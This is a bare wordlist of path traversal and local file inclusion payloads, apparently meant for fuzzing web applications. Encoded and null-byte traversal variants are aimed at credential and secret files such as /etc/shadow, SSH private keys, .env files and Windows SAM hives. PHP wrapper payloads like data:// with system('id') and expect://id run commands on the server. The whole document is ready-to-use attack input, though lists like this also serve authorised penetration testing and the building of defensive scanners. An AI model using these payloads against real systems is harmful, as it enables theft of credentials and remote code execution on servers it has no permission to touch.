../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
....//etc/passwd
....\/etc/passwd
..././etc/passwd
...\../etc/passwd
..\..\..\etc\passwd
..%2Fetc%2Fpasswd
..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%252F..%252Fetc%252Fpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
..%c0%af..%c0%afetc%c0%afpasswd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/os-release
/etc/group
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/maps
/proc/net/tcp
/proc/net/arp
/proc/version
/proc/self/status
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/httpd/access_log
/var/log/nginx/access.log
/var/log/auth.log
/var/log/syslog
/var/log/mail.log
/var/log/vsftpd.log
/var/log/ssh/auth.log
/var/www/html/index.php
/var/www/html/.env
/var/www/.env
/app/.env
/app/config/database.yml
/app/config/secrets.yml
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/mysql/my.cnf
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.bash_history
/home/user/.ssh/id_rsa
/home/user/.bash_history
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\Windows\boot.ini
C:\inetpub\wwwroot\web.config
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\bin\my.ini
C:\Users\Administrator\.ssh\id_rsa
C:\Windows\repair\sam
C:\Windows\repair\system
C:\Windows\repair\software
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/read=string.rot13/resource=/etc/passwd
php://input
php://fd/0
data://text/plain,<?php system('id');?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+
expect://id
expect://whoami
zip://path/to/file.zip#shell.php
phar://path/to/file.phar/shell
file:///etc/passwd
file://localhost/etc/passwd
